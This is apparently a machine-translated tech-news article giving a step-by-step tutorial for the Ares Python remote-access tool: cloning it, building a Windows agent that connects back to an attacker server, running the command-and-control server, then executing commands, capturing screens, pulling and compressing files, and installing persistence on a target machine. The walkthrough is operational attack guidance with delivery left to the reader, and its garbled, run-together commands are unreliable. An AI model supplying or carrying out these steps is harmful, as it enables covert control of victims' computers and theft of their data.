Shulou(Shulou.com)06/02 Report--

Editor to share with you how to use Ares this tool in Python, I believe most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

Installation

First, we need to install the tool on the attacker's machine. We cloned it directly from GitHub. When we are done, we use the cd command to traverse the newly created directory called Ares, as shown below.

Git clone / / github.com/sweetsoftware/Ares.gitcd Aresls

Next, in order for the tool to work properly, we need to install some dependencies. Just install the requirements.txt file, which contains the details of the python libraries that need to be installed.

Pip install-r requirements.txt

Because we are targeting Windows machines, we need to compile agent that is compatible with Windows machines. To do this, we need to install wine first. It may take some time here.

Ls./wine_setup.sh target utilization

At this point, we have successfully installed all the conditions necessary to run Ares. Next we can try to get a CNC session with the target machine. To achieve this, we also need an agent. We use the cd command to traverse the agent directory. Then use the ls command to list the files and find one of the configuration files. We need to edit the file to get the session.

Cd agent/lsnano config.py

You can see that when we open the configuration file with the nano command, there is an IP address in the SERVER variable. We edit it and change it to the intranet IP address of the attacker's machine, taking my IP (192.168.1.4) as an example. We do not need to modify the other parameter values, save and exit the nano editor.

After the config file is configured, let's create an agent. Since our target machine is Windows, we will create a proxy for Windows using the following command.

. / builder.py-p Windows-server / / 192.168.1.4 server 8080-o agent.exe

After the creation is completed, you can choose a way you like to send this agent to the target computer. After that, we need to start the server. This is required because the agent will communicate with the server. Let's go back to the Ares directory. There is a subdirectory called server. After traversing it, we need to initialize the database (only when we use it for the first time), because we will use the initdb parameter. Now we will run the server as shown in the following figure.

Lscd server/./ares.py initdb./ares.py runserver-h 0.0.0.0-p 8080-- threaded

Now, we navigate to the server IP in the browser. You will see a form that asks us to set a password. When you are finished typing, click Define to continue.

Next, we will be asked to enter the password we just set to log in.

Here we can see several main indexes of Ares GUI, including: Change Password,Disconnect,Agent List. Now, let's go back to the step of creating the agent. We won't get an Agent in Agent List until we execute the agent on the target machine.

As shown in the following figure, we have a living agent. We can see the name and status of the agent, the user who logged in when the agent went online, and we also have the host name. We also got the IP and system type of the target. Here, we can run agents on multiple devices, and each device can be seen here. We can select a session from here and execute the same command on multiple sessions at the same time. Let's click on the name to continue.

Command execution

Let's first run a systeminfo command to see. As shown below, we have obtained all the system configuration information for the target machine.

Systeminfo screenshot

Now, let's try to capture the screen of the target machine. Enter the screen capture command, and the agent will take the screenshot and provide the link shown in the figure. Open the link and we can see the latest screenshot.

Screenshot file download

We can also use this agent to download files from a remote destination. If you want to download a file, you must know the file name. You can use the dir command to get the file name. Once we know the file name, we can download the corresponding file to our local attack plane, as shown in the following figure.

Download file.txt compressed file

We can use Ares agent to compress directories on remote destinations. A directory name is also required. After extracting the directory name, we can use the following command to compress the file remotely. Where 'sample'' is the name of the directory and 'compressed.zip' is the name of the compressed file.

Zip compressed.zip sample persistence proxy

We can use the persist command to invoke persistence in the agent. This command installs the agent on the remote destination.

PersistClean Up

When the final task is complete, we can use the clean command to remove the agent from the target computer.

Clean

These are all the contents of this article entitled "how to use Ares in Python". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.